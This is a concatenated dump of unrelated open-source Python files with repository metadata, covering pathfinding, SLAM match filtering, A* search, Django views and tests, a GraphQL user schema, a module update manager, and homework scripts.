| 937
|
py
|
class Solution:
"""
@param targetMap:
@return: nothing
"""
def shortestPath(self, targetMap):
n = len(targetMap)
m = len(targetMap[0])
from queue import Queue
q = Queue()
q.put((0, 0))
visited = [[False for _ in range(m)] for __ in range(n)]
visited[0][0] = True
steps = -1
while not q.empty():
steps += 1
for _ in range(q.qsize()):
x, y = q.get()
if targetMap[x][y] == 2:
return steps
for move in [[0, 1], [1, 0], [-1, 0], [0, -1]]:
x_ = x + move[0]
y_ = y + move[1]
if x_ < 0 or x_ >= n or y_ < 0 or y_ >= m or targetMap[x_][y_] == 1 or visited[x_][y_]:
continue
q.put((x_, y_))
visited[x_][y_] = True
return -1
|
[
"mike.tc.chen101@gmail.com"
] |
mike.tc.chen101@gmail.com
|
ee81b899c6541035f84172ed6bdc9122b5c2ad05
|
58ca1aedfd2c2c43ce3f71e7877f92c51d41adf8
|
/filter_boost.py
|
7eb7dd7c85ddbaf8c0158ea3ec0773068f690eb8
|
[] |
no_license
|
seaun163/DeepSLAM
|
00d88ee00367987cb4b7a57db3b0bedafeeb4e68
|
a038772bd7de897fb8253214813bfab09e31d62f
|
refs/heads/master
| 2021-01-25T08:19:28.198277
| 2016-10-18T19:11:32
| 2016-10-18T19:11:32
| 93,752,917
| 1
| 0
| null | 2017-06-08T13:32:24
| 2017-06-08T13:32:24
| null |
UTF-8
|
Python
| false
| false
| 4,391
|
py
|
import numpy as np
import h5py
import scipy.sparse
import scipy.io
from constants import *
import ipdb
import os
import pickle
# frame length, which also dictates the delay being frame capture and feedback
# because of forward_fit
# which isn't even in the report...
flen = DEE
flen_2 = 3
dt = EPSILON
st = 0.75 #kind of equivalent to sigma
"""
import sys
from IPython.core import ultratb
sys.excepthook = ultratb.FormattedTB(mode='Verbose',
color_scheme='Linux', call_pdb=1)
"""
res_dict = {}
ground_truth = scipy.io.loadmat('GroundTruth_Eynsham_40meters.mat')['ground_truth']
for fname in os.listdir("good"):
### Get matches from confusion matrix ###
# load the confusion matrix
dname = "dataset"
print("opening file %s" %fname)
h5f = h5py.File("good/"+fname, 'r')
conf_matrix = h5f[dname][:]
h5f.close()
print("procesing layer")
# grab the testing matrix from the confusion matrix
test_matrix = conf_matrix[0:4789, 4789:9575]
# the min score is the best match
b = np.argmin(test_matrix, axis=0)
# Percentage of top matches used in the vibration calculation, allows the occasional outlier
inlier_fraction = 5/6.0
matches = np.zeros(int(b.size - flen + flen_2))
stable_count = 0
# WHY NOT FILTER AROUND? Change to get same results but neater?
for i in range(0, b.size - flen):
match_index = int(i + flen_2)
# Check that the match being considered is continous with those around it
vibrations = np.abs( np.diff(b[i:i + flen]) )
sorted_vib = np.sort(vibrations)
max_diff = np.max(sorted_vib[ 0 : int(np.round(inlier_fraction * flen)) ])
stable = max_diff <= dt
# linear regression to get slope of fit
pt = np.polyfit( np.arange(0, flen), b[i:i + flen], 1)
# This is the slope, because highest powers first
velocity = pt[0]
# forward match with a tolerance of -1 and +1
# absolute value to check going forwards or backwards
forward_match = np.abs(velocity - 1) < st or np.abs(velocity + 1) < st
if stable and forward_match:
# smooth the value based off of those around it
matches[match_index] = pt[1] + pt[0] * 0.5 * flen
for j in range(1, flen_2 + 1):
back_chk = match_index - j
front_chk = match_index + j
# fill in the zero (default) values if possible
if matches[back_chk] == 0:
matches[back_chk] = b[back_chk]
# fill in base values for future vals
if front_chk < 4783:
matches[front_chk] = b[front_chk]
### Compare to ground truth ###
print("zeros")
print(np.where(matches == 0)[0].size)
print("comparing to ground truth")
start_first = 1
end_first = 4788
len_first = end_first - start_first + 1
start_second = 4789
end_second = 9574
len_second = end_second - start_second + 1
half_matrix = 4785
ground_matrix = np.zeros((len_second, len_first))
tp_num = 0
tp_value = []
fp_num = 0
fp_value = []
for ground_idx in range(start_second, end_second):
value_ground = ground_truth[ground_idx, :]
value_fit = value_ground.toarray().flatten().nonzero()[0]
# only store those in first round
value_fit2 = value_fit[ np.where(value_fit < end_first)[0].astype(int) ]
value_fit3 = value_fit2 - start_first + 1
value_fit4 = value_fit3[ np.where(value_fit3 > 0)[0].astype(int) ]
matrix_idx = ground_idx - start_second + 1
ground_matrix[matrix_idx, value_fit4] = 1
for truth_idx in range(0, matches.size):
ground_row = ground_truth[truth_idx+end_first, :]
ground_row_idx = ground_row.toarray().flatten().nonzero()[0]
if matches[truth_idx] != 0:
truth_va = np.round(matches[truth_idx])
if np.any(ground_row_idx == np.round(truth_va)):
tp_num = tp_num + 1
tp_value = [tp_value, truth_idx]
else:
fp_num = fp_num + 1
fp_value = [fp_value, truth_idx]
precision = tp_num / float(tp_num + fp_num)
print(precision)
recall = tp_num / float(b.size)
print(recall)
res_dict[fname] = (precision, recall)
pickle.dump(res_dict, open("filter_res.p", "wb"))
|
[
"saubin@uwaterloo.ca"
] |
saubin@uwaterloo.ca
|
9358246c129bb1d8b1e564a81ba419196d73a04a
|
30f6633a24d799fddd51672c528e4baee649d8cd
|
/6.01/designLab09/simulator/core/search/search.py
|
11d2ff11f60cd14eada34c78bd6c767fc197f676
|
[] |
no_license
|
Rajpratik71/mit-courses
|
e12c864435a1af2c8b7034af956fd2f53d559cfc
|
86a06a3192e17230a05c5c7beeed5699df73be22
|
refs/heads/master
| 2023-06-22T21:05:37.240985
| 2023-01-26T06:44:49
| 2023-01-26T06:44:49
| 192,182,074
| 0
| 2
| null | 2023-04-05T04:00:47
| 2019-06-16T11:15:24
|
TeX
|
UTF-8
|
Python
| false
| false
| 3,299
|
py
|
"""
Search infrastructure.
Credit to Chapter 7 of MIT 6.01 notes
(http://mit.edu/6.01/www/handouts/readings.pdf).
"""
__author__ = 'mikemeko@mit.edu (Michael Mekonnen)'
from constants import PRINT_FAIL_REASON
from core.data_structures.priority_queue import Priority_Queue
class Search_Node:
"""
Representation for a node in the search graph. Clients of the search
infrastructure should use subclasses of Search_Node implementing the
get_children method.
"""
def __init__(self, state, parent=None, cost=0):
"""
|state|: state of the search node, dependent on the application.
|parent|: parent node to this node, None if this node is the root.
|cost|: cost to reach from the root node to this node.
"""
self.state = state
self.parent = parent
self.cost = cost
def get_children(self):
"""
Should return a list of the Search_Nodes that are reachable from this node.
"""
raise NotImplementedError('subclasses should implement this')
def get_path(self):
"""
Returns a list of the states of the nodes from the root to this node.
"""
path = []
current = self
while current is not None:
path = [current.state] + path
current = current.parent
return path
def a_star(start_node, goal_test, heuristic=lambda state: 0, best_first=False,
progress=lambda state, cost: None, max_states_to_expand=None, verbose=True):
"""
Runs an A* search starting at |start_node| until a node that satisfies the
|goal_test| is found. |goal_test| should be a function that takes in a
state of a node and returns True if the desired goal has been satisfied.
|heuristic| is a map from node states to estimates of distance to the
goal, should be admissible to produce optimal value, and can result in
considerable speed-up! (See Chapter 7 of MIT 6.01 course notes for more.)
Returns the node whose state satisfies teh |goal_test|, or None if no such
node is found. Also returns the total number of nodes expanded.
For progress checks, everytime a node is popped out of the priority queue,
this methods calls |progress| with the state and cost of the node that
was just popped.
So that a search problem does not take too long without success, may give a
|max_states_to_expand| after which the search stops and returns None.
"""
if goal_test(start_node.state):
return start_node, 0
agenda = Priority_Queue()
agenda.push(start_node, (not best_first) * start_node.cost +
heuristic(start_node.state))
expanded = set()
while agenda:
parent, cost = agenda.pop()
progress(parent.state, cost)
if parent.state not in expanded:
if goal_test(parent.state):
return parent, len(expanded)
expanded.add(parent.state)
for child in parent.get_children():
if child.state not in expanded:
agenda.push(child, (not best_first) * child.cost +
heuristic(child.state))
if max_states_to_expand and len(expanded) > max_states_to_expand:
if PRINT_FAIL_REASON:
if verbose:
print 'exceeded number of states to expand'
return None, len(expanded)
if PRINT_FAIL_REASON:
if verbose:
print 'exhausted search space'
return None, len(expanded)
|
[
"wangjohn@mit.edu"
] |
wangjohn@mit.edu
|
70be3975013551c5c951c1f9da8444e2c6273397
|
9eb48a3b8d5b1127012579a818ad349d21df2414
|
/Django2.6/djusers2/djusers2/urls.py
|
cb92ccbd44dd9b5cf5eef70172579be1432e0fdf
|
[] |
no_license
|
rahulsayon/Django1-to-Django-1.8
|
b864deb46529c29a6cd424e3c9f1e99baa8942af
|
2f4ae9343b631ff53caa50c8a822c7b4718c5512
|
refs/heads/master
| 2022-12-11T17:02:24.183982
| 2020-09-06T15:31:02
| 2020-09-06T15:31:02
| 293,305,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,026
|
py
|
"""djusers2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from accounts.views import register , user_login ,user_logout, activate_user_view
urlpatterns = [
path('admin/', admin.site.urls),
path('register/', register),
path('login/', user_login),
path('logout/', user_logout),
path('logout/', user_logout),
path('activate/<slug:code>', activate_user_view),
]
|
[
"rahulsayon95@gmail.com"
] |
rahulsayon95@gmail.com
|
808034c7ccf8082a00e739cd27d0b9f1e4d28040
|
c4af06a090818ea05b3e6c11866406b4a5d3378a
|
/diary/tests/test_views.py
|
d75d629eb6e2caf9d9a6ef65d1557b70f5eb02f1
|
[] |
no_license
|
shige-horiuchi/private_diary
|
c88adff27bf4208ca7451bff841e5f300ac64d0a
|
e8b3cb63129c73d6c98f530ef543c19b02a5e79c
|
refs/heads/master
| 2021-01-03T19:03:29.599143
| 2020-02-21T06:51:37
| 2020-02-21T06:51:37
| 240,201,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,717
|
py
|
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse_lazy
from ..models import Diary
class LoggedInTestCase(TestCase):
"""各テストクラスで共通の事前準備処理をオーバーライドした独自TestCaseクラス"""
def setUp(self):
"""テストメソッド実行前の事前設定"""
# テストユーザーのパスワード
self.password = '<ログインパスワード>'
# 各インスタンスメソッドで使うテスト用ユーザーを生成し
# インスタンス変数に格納しておく
self.test_user = get_user_model().objects.create_user(
username='<ログインユーザー名>',
email='<ログインユーザーのメールアドレス>',
password=self.password)
# テスト用ユーザーでログインする
self.client.login(email=self.test_user.email, password=self.password)
class TestDiaryCreateView(LoggedInTestCase):
"""DiaryCreateView用のテストクラス"""
def test_create_diary_success(self):
"""日記作成処理が成功することを検証する"""
# Postパラメータ
params = {'title': 'テストタイトル',
'content': '本文',
'photo1': '',
'photo2': '',
'photo3': ''}
# 新規日記作成処理(Post)を実行
response = self.client.post(reverse_lazy('diary:diary_create'), params)
# 日記リストページへのリダイレクトを検証
self.assertRedirects(response, reverse_lazy('diary:diary_list'))
# 日記データがDBに登録されたかを検証
self.assertEqual(Diary.objects.filter(title='テストタイトル').count(), 1)
def test_create_diary_failure(self):
"""新規日記作成処理が失敗することを検証する"""
# 新規日記作成処理(Post)を実行
response = self.client.post(reverse_lazy('diary:diary_create'))
# 必須フォームフィールドが未入力によりエラーになることを検証
self.assertFormError(response, 'form', 'title', 'このフィールドは必須です。')
class TestDiaryUpdateView(LoggedInTestCase):
"""DiaryUpdateView用のテストクラス"""
def test_update_diary_success(self):
"""日記編集処理が成功することを検証する"""
# テスト用日記データの作成
diary = Diary.objects.create(user=self.test_user, title='タイトル編集前')
# Postパラメータ
params = {'title': 'タイトル編集後'}
# 日記編集処理(Post)を実行
response = self.client.post(reverse_lazy('diary:diary_update', kwargs={'pk': diary.pk}), params)
# 日記詳細ページへのリダイレクトを検証
self.assertRedirects(response, reverse_lazy('diary:diary_detail', kwargs={'pk': diary.pk}))
# 日記データが編集されたかを検証
self.assertEqual(Diary.objects.get(pk=diary.pk).title, 'タイトル編集後')
def test_update_diary_failure(self):
"""日記編集処理が失敗することを検証する"""
# 日記編集処理(Post)を実行
response = self.client.post(reverse_lazy('diary:diary_update', kwargs={'pk': 999}))
# 存在しない日記データを編集しようとしてエラーになることを検証
self.assertEqual(response.status_code, 404)
class TestDiaryDeleteView(LoggedInTestCase):
"""DiaryDeleteView用のテストクラス"""
def test_delete_diary_success(self):
"""日記削除処理が成功することを検証する"""
# テスト用日記データの作成
diary = Diary.objects.create(user=self.test_user, title='タイトル')
# 日記削除処理(Post)を実行
response = self.client.post(reverse_lazy('diary:diary_delete', kwargs={'pk': diary.pk}))
# 日記リストページへのリダイレクトを検証
self.assertRedirects(response, reverse_lazy('diary:diary_list'))
# 日記データが削除されたかを検証
self.assertEqual(Diary.objects.filter(pk=diary.pk).count(), 0)
def test_delete_diary_failure(self):
"""日記削除処理が失敗することを検証する"""
# 日記削除処理(Post)を実行
response = self.client.post(reverse_lazy('diary:diary_delete', kwargs={'pk': 999}))
# 存在しない日記データを削除しようとしてエラーになることを検証
self.assertEqual(response.status_code, 404)
|
[
"shige33717@gmail.com"
] |
shige33717@gmail.com
|
2210cba8d3da1e4a07b474131e7a1c9266cffc5a
|
35522da66f15ee51a251b008b39d3457e70cf7de
|
/web/nut/models/NUTInput.py
|
cc23dbe18e3c2bb3285d3337197789cb5d7fa33c
|
[] |
no_license
|
yeleman/nut
|
34d74e72d137903285f3938f3165cefb45afb7ea
|
5e68ae23df6c4d77a055dfbe85ae37a9fcdc4cd0
|
refs/heads/master
| 2016-09-06T03:19:55.898651
| 2012-02-06T18:30:25
| 2012-02-06T18:30:25
| 2,733,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
#!/usr/bin/env python
# encoding=utf_8
# maintainer: rgaudin
from django.db import models
from django.utils.translation import ugettext_lazy as _, ugettext
class NUTInput(models.Model):
""" Input """
class Meta:
app_label = 'nut'
verbose_name = _(u"Input")
verbose_name_plural = _(u"Inputs")
name = models.CharField(_(u"Name"), max_length=50)
slug = models.SlugField(_(u"Slug"), max_length=15, primary_key=True)
def __unicode__(self):
return self.name
|
[
"rgaudin@gmail.com"
] |
rgaudin@gmail.com
|
8d48f45e0e6026af661aef287d578466e41d8245
|
d22db204c665d16847447551cedc07756d357eb2
|
/hydrus/client/gui/ClientGUICore.py
|
11dfa96ae748ebcb4c2a0789eebcbcacc9172d7b
|
[
"WTFPL"
] |
permissive
|
Suika/hydrus
|
9d5070d47c328b7054a9699de310ce580e563528
|
4b2b15e152e4bed900aa972c7d4b27f7bf242f29
|
refs/heads/master
| 2023-05-28T00:32:50.364999
| 2023-05-10T20:22:34
| 2023-05-10T20:22:34
| 237,063,790
| 1
| 2
|
NOASSERTION
| 2022-10-29T22:36:54
| 2020-01-29T19:23:21
|
Python
|
UTF-8
|
Python
| false
| false
| 2,153
|
py
|
from qtpy import QtCore as QC
from qtpy import QtGui as QG
from qtpy import QtWidgets as QW
from hydrus.core import HydrusConstants as HC
from hydrus.client.gui import ClientGUIMenus
class GUICore( QC.QObject ):
my_instance = None
def __init__( self ):
QC.QObject.__init__( self )
self._menu_open = False
GUICore.my_instance = self
@staticmethod
def instance() -> 'GUICore':
if GUICore.my_instance is None:
raise Exception( 'GUICore is not yet initialised!' )
else:
return GUICore.my_instance
def MenubarMenuIsOpen( self ):
self._menu_open = True
def MenubarMenuIsClosed( self ):
self._menu_open = False
def MenuIsOpen( self ):
return self._menu_open
def PopupMenu( self, window: QW.QWidget, menu: QW.QMenu ):
if HC.PLATFORM_MACOS and window.window().isModal():
# Ok, seems like Big Sur can't do menus at the moment lmao. it shows the menu but the mouse can't interact with it
from hydrus.core import HydrusGlobals as HG
if HG.client_controller.new_options.GetBoolean( 'do_macos_debug_dialog_menus' ):
from hydrus.client.gui import ClientGUICoreMenuDebug
ClientGUICoreMenuDebug.ShowMenuDialog( window, menu )
ClientGUIMenus.DestroyMenu( menu )
return
if not menu.isEmpty():
self._menu_open = True
menu.exec_( QG.QCursor.pos() ) # This could also be window.mapToGlobal( QC.QPoint( 0, 0 ) ), but in practice, popping up at the current cursor position feels better.
self._menu_open = False
ClientGUIMenus.DestroyMenu( menu )
core = GUICore.instance
|
[
"hydrus.admin@gmail.com"
] |
hydrus.admin@gmail.com
|
d7a93b3db19f615ebcdd0ac1d10a919df7fbe912
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03946/s474179666.py
|
715113807ff685cf063ff9f19abb2a900c2d1f50
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
n,t=map(int,input().split())
a=list(map(int,input().split()))
diff_v=0
max_a_v=0
max_a_pos=[]
aa=set([])
bb=set([])
for i in range(1,len(a)):
index=len(a)-i-1
if max_a_v<a[index+1]:
max_a_v=a[index+1]
max_a_pos=[index+1]
elif max_a_v==a[index+1]:
max_a_pos.append(index+1)
if max_a_v-a[index]>diff_v:
diff_v=max_a_v-a[index]
aa=set([index])
bb=set(max_a_pos)
elif max_a_v-a[index]==diff_v:
aa.add(index)
bb|=set(max_a_pos)
#print(a[index],max_a_v,diff_v,aa,bb)
print(min(len(list(aa)),len(list(bb))))
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
9fc53d2f86b48376293a5a058d7bc51c042f9954
|
432a8d6bc8ad5af9cb5585c2184b05f58e842285
|
/realestate/utils/lib.py
|
4d27c004e2ffb49fcfc1a66ea242da7599daace1
|
[] |
no_license
|
314casso/estate-agent
|
963e2a909ac9b190253d8ee40a69947cf19b1261
|
ccd07bd599dc51251523cf5e4ea6991b1d0d529d
|
refs/heads/master
| 2022-03-21T04:37:44.946548
| 2022-03-15T19:29:06
| 2022-03-15T19:29:06
| 4,037,752
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,169
|
py
|
# -*- coding: utf-8 -*-
from estatebase.models import LayoutFeature
_capital_letters = {
u'А': u'A',
u'Б': u'B',
u'В': u'V',
u'Г': u'G',
u'Д': u'D',
u'Е': u'E',
u'Ё': u'E',
u'Ж': u'Zh',
u'З': u'Z',
u'И': u'I',
u'Й': u'Y',
u'К': u'K',
u'Л': u'L',
u'М': u'M',
u'Н': u'N',
u'О': u'O',
u'П': u'P',
u'Р': u'R',
u'С': u'S',
u'Т': u'T',
u'У': u'U',
u'Ф': u'F',
u'Х': u'H',
u'Ц': u'Ts',
u'Ч': u'Ch',
u'Ш': u'Sh',
u'Щ': u'Sch',
u'Ъ': u'',
u'Ы': u'Y',
u'Ь': u'',
u'Э': u'E',
u'Ю': u'Yu',
u'Я': u'Ya',}
_lower_case_letters = {
u'а': u'a',
u'б': u'b',
u'в': u'v',
u'г': u'g',
u'д': u'd',
u'е': u'e',
u'ё': u'e',
u'ж': u'zh',
u'з': u'z',
u'и': u'i',
u'й': u'y',
u'к': u'k',
u'л': u'l',
u'м': u'm',
u'н': u'n',
u'о': u'o',
u'п': u'p',
u'р': u'r',
u'с': u's',
u'т': u't',
u'у': u'u',
u'ф': u'f',
u'х': u'h',
u'ц': u'ts',
u'ч': u'ch',
u'ш': u'sh',
u'щ': u'sch',
u'ъ': u'',
u'ы': u'y',
u'ь': u'',
u'э': u'e',
u'ю': u'yu',
u'я': u'ya',}
def transliterate(string):
capital_letters = _capital_letters
lower_case_letters = _lower_case_letters
len_str = len(string)
translit_string = u""
for index, char in enumerate(string, 1):
repl = lower_case_letters.get(char)
if repl:
translit_string += repl
continue
repl = capital_letters.get(char)
if repl:
if len_str > index:
if string[index] not in lower_case_letters:
repl = repl.upper()
else:
repl = repl.upper()
else:
repl = ''
translit_string += repl
return translit_string
for st in LayoutFeature.objects.all().order_by('name'):
result = '%s = %s' % (transliterate(st.name), st.pk)
print result.upper()
# lst = list(WallConstrucion.objects.values_list('name', flat=True).order_by('id'))
# print ', '.join(lst)
|
[
"picasso75@yandex.ru"
] |
picasso75@yandex.ru
|
7f5db971fd478bb2ddf727c5947c78c2ad8f595f
|
ef50ddb13bc1e21e0feb7ccef228d7593a67924a
|
/vize/130401064.py
|
cbb6d848233adc660af1fb03870ab2d065225646
|
[
"Unlicense"
] |
permissive
|
nyucel/blm2010
|
8577ffda17312b41545ad4b9e2fef10b99bd3d8e
|
544df2b5c946fba1864c4c6c3a6e349d0f10d18e
|
refs/heads/master
| 2022-11-16T16:12:50.811339
| 2020-06-27T11:10:55
| 2020-06-27T11:10:55
| 259,298,537
| 3
| 155
|
Unlicense
| 2020-06-27T11:10:57
| 2020-04-27T11:49:35
|
Python
|
UTF-8
|
Python
| false
| false
| 2,622
|
py
|
# Süleyman Baltacı - 130401064
# -*- coding: utf-8 -*-
import numpy as np
def RMSE(pred, target):
err = np.subtract(target, pred)
return (np.mean(err**2))**0.5
# veri dosyasi acilir
f = open("veriler.txt")
# veriler okunur, varsa bos satirlar silinir
data = f.readlines()
if "\n" in data: data.remove("\n")
# veriler numpy array seklinde y'ye kaydedilir, x 0'dan baslatilir
y = np.array(data, dtype=int)
x = np.array([i for i in range(len(y))], dtype=int)
# sonuc dosyasi acilir
f_sonuc = open("sonuclar.txt","w+")
f_sonuc.write("Tum veri uzerine tek bir polinom tanimlandiginda:\n\n")
## Tum veri uzerine tek bir polinom fit edilginde:
RMSE_list = [0]*6
for i in range(6):
# ip : interpolasyon fonksiyonu
poly = np.poly1d(np.polyfit(x, y, i+1))
f_sonuc.write(f"Polinom derecesi: {i+1} \n")
f_sonuc.write(f"Katsayilar: {poly.coeffs} \n")
# RMSE hesaplanir
RMSE_list[i] = RMSE(poly(x), y)
f_sonuc.write(f"RMSE: {RMSE_list[i]:.3f} \n\n")
# en iyi sonucu veren polinomun derecesi bulunur, RMSE ile birlikte yazdirilir
eniyi_derece = np.argmin(RMSE_list)+1
f_sonuc.write(f"En dusuk hatayi {eniyi_derece}. dereceden polinom vermektedir.\n")
f_sonuc.write(f"RMSE: {RMSE_list[eniyi_derece-1]:.3f} \n\n\n")
## veri onluk kisimlara bolunerek her birine polinom fit edildiginde:
f_sonuc.write("Her bir onluk icin farkli polinomlar bulundugunda:\n\n")
# kac farkli polinom gerektigi hesaplanir:
onluk_sayisi = int((len(x)/10)) + 1
for i in range(onluk_sayisi):
# polinom fit edilecek aralik icin indexler bulunur, x ve y datasi secilir:
i_min = i*10
i_max = min(i*10+9, len(x)-1)
x_curr = x[i_min:i_max+1:]
y_curr = y[i_min:i_max+1:]
# her bir dereceden polinomlarin ve RMSE'lerinin tutulacagi listler tanimlanir
poly_lst =[]
RMSE_list = []
# polinom fit edilecek aralik eger 7'den kucuk veri iceriyorsa,
# en fazla (bu araliktaki nokta sayisi) - 1 dereceli polinom denenir
for j in range(min(i_max-i_min, 6)):
# poly_lst listesine j dereceli polinom fit edilir, RMSE hesaplanir
poly_lst.append(np.poly1d(np.polyfit(x_curr, y_curr, j+1)))
RMSE_list.append(RMSE(poly_lst[j](x_curr), y_curr))
# en iyi sonucu veren polinom derecesi bulunur ve sonuc yazdirilir
eniyi_derece = np.argmin(RMSE_list) + 1
f_sonuc.write(f"x : [ {x[i_min]} {x[i_max]} ]\n")
f_sonuc.write(f"Polinom derecesi: {eniyi_derece}, ")
f_sonuc.write(f"RMSE: {RMSE_list[eniyi_derece-1]:.3f} \n\n")
f_sonuc.close()
f.close()
|
[
"necdetyucel@gmail.com"
] |
necdetyucel@gmail.com
|
628f41c51f58945e9f1e879863efe51d95e39ea8
|
cdf38bcd5f8a1f383a6c3b7d427382c3b83d4831
|
/users/schema.py
|
e49405ee50228175e5c6b66cdf5d7415c987d34b
|
[] |
no_license
|
profmcdan/real-estate-api
|
95725947f8893fbdf37156e2dc0055cd64e4f75e
|
44fe874151844139dc1f912128534565a6cfc029
|
refs/heads/master
| 2023-08-09T07:15:25.400049
| 2019-10-19T20:05:44
| 2019-10-19T20:05:44
| 216,026,644
| 0
| 0
| null | 2023-07-22T19:08:33
| 2019-10-18T13:09:48
|
Python
|
UTF-8
|
Python
| false
| false
| 1,247
|
py
|
from django.contrib.auth import get_user_model
import graphene
from graphene_django import DjangoObjectType
from graphql import GraphQLError
class UserType(DjangoObjectType):
class Meta:
model = get_user_model()
class CreateUser(graphene.Mutation):
user = graphene.Field(UserType)
class Arguments:
email = graphene.String(required=True)
password = graphene.String(required=True)
firstname = graphene.String(required=True)
lastname = graphene.String(required=True)
def mutate(self, info, email, firstname, lastname, password):
user = get_user_model().objects.create_user(email=email, password=password,
firstname=firstname, lastname=lastname)
return CreateUser(user=user)
class Mutation(graphene.ObjectType):
create_user = CreateUser.Field()
class Query(graphene.ObjectType):
users = graphene.List(UserType)
me = graphene.Field(UserType)
def resolve_users(self, info):
return get_user_model().objects.all()
def resolve_me(self, info):
user = info.context.user or None
if user.is_anonymous:
raise GraphQLError('Authentication required')
return user
|
[
"danielale9291@gmail.com"
] |
danielale9291@gmail.com
|
bd0ff58733337b54a62c497740f531e4ad1eb6c9
|
e972e39c4580ce0099eb905c1922b501dce54901
|
/update/manager.py
|
425234f3f256bc175b8da462919582e9e8e6f79b
|
[
"Apache-2.0"
] |
permissive
|
y-du/module-update-service
|
cf8070e1fa842ea7767fb8315b2bb1bd377ff623
|
34de1474ab26cd8f590d93809ddf1376a62d8b49
|
refs/heads/master
| 2022-09-12T09:21:12.200249
| 2020-05-25T18:46:26
| 2020-05-25T18:46:26
| 266,853,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,985
|
py
|
"""
Copyright 2020 Yann Dumont
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ("Manager", )
from .logger import getLogger
from .configuration import mu_conf, EnvVars
from .util import ModuleState, getDelay
import requests
import time
logger = getLogger(__name__.split(".", 1)[-1])
class Manager:
def __get(self, url):
response = requests.get(url=url)
if not response.status_code == 200:
raise RuntimeError(response.status_code)
return response.json()
def __getRemoteModules(self, url, mod_ids):
modules = dict()
for mod_id in mod_ids:
try:
modules[mod_id] = self.__get("{}/{}".format(url, mod_id))
except Exception as ex:
logger.error("can't retrieve module '{}' from registry - {}".format(mod_id, ex))
return modules
def __mergeConfigs(self, old: dict, new: dict):
for key in old:
for k, v in old[key]["service_configs"].items():
if k in new[key]["service_configs"] and not v == new[key]["service_configs"][k]:
logger.debug("found user value for '{}'".format(k))
new[key]["service_configs"][k] = v
def run(self):
try:
while True:
time.sleep(getDelay())
try:
local_mods = self.__get("{}/{}".format(mu_conf.MM.url, mu_conf.MM.api))
remote_mods = self.__getRemoteModules("{}/{}".format(mu_conf.MR.url, mu_conf.MR.api), local_mods.keys())
pending = list()
for mod_id in set(local_mods) & set(remote_mods):
logger.info("checking '{}' ...".format(local_mods[mod_id]["name"]))
if not local_mods[mod_id]["hash"] == remote_mods[mod_id]["hash"]:
pending.append(mod_id)
logger.info("update pending for '{}' ...".format(local_mods[mod_id]["name"]))
for mod_id in pending:
logger.info("merging configs for '{}' ...".format(local_mods[mod_id]["name"]))
configs = self.__get("{}/{}/{}".format(mu_conf.CS.url, mu_conf.CS.api, mod_id))
self.__mergeConfigs(configs, remote_mods[mod_id]["services"])
for mod_id in pending:
logger.info("updating '{}' ...".format(local_mods[mod_id]["name"]))
requests.patch(url="{}/{}/{}".format(mu_conf.MM.url, mu_conf.MM.api, mod_id), json={"state": ModuleState.inactive})
while True:
response = self.__get("{}/{}/{}".format(mu_conf.MM.url, mu_conf.MM.api, mod_id))
if response["state"] == ModuleState.inactive:
break
time.sleep(1)
remote_mods[mod_id]["id"] = mod_id
requests.post(url="{}/{}".format(mu_conf.MM.url, mu_conf.MM.api), json=remote_mods[mod_id])
requests.patch(url="{}/{}/{}".format(mu_conf.MM.url, mu_conf.MM.api, mod_id), json={"state": ModuleState.active})
logger.info("update for '{}' successful".format(local_mods[mod_id]["name"]))
except Exception as ex:
logger.exception("error during update:".format(ex))
finally:
pass
|
[
"42994541+y-du@users.noreply.github.com"
] |
42994541+y-du@users.noreply.github.com
|
f3cb3e73b19d480a327c9c4be7db3b599096e61e
|
9918208c80a3c396d8a1e13783d501d60dbc2050
|
/integration_tests/conftest.py
|
3fb8ef70a199bdfdb9c0ef602f656687b6fc764c
|
[] |
no_license
|
benjimin/digitalearthau
|
2d3010be76fad0d0b6b4854dbbad07e98254b239
|
5098bf3c88627cad78a8caa5ab703c586c17a6f7
|
refs/heads/develop
| 2022-02-27T07:36:16.009689
| 2017-09-14T05:51:27
| 2017-09-14T05:51:27
| 103,460,937
| 0
| 0
| null | 2017-09-13T23:10:15
| 2017-09-13T23:10:15
| null |
UTF-8
|
Python
| false
| false
| 3,552
|
py
|
import itertools
import logging
import os
from contextlib import contextmanager
from pathlib import Path
import pytest
import shutil
import yaml
import digitalearthau
from datacube.config import LocalConfig
from datacube.index._api import Index
from datacube.index.postgres import PostgresDb
from datacube.index.postgres import _dynamic
from datacube.index.postgres.tables import _core
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
INTEGRATION_DEFAULT_CONFIG_PATH = Path(__file__).parent.joinpath('deaintegration.conf')
INTEGRATION_TEST_DATA = Path(__file__).parent / 'data'
PROJECT_ROOT = Path(__file__).parents[1]
DEA_MD_TYPES = digitalearthau.CONFIG_DIR / 'metadata-types.yaml'
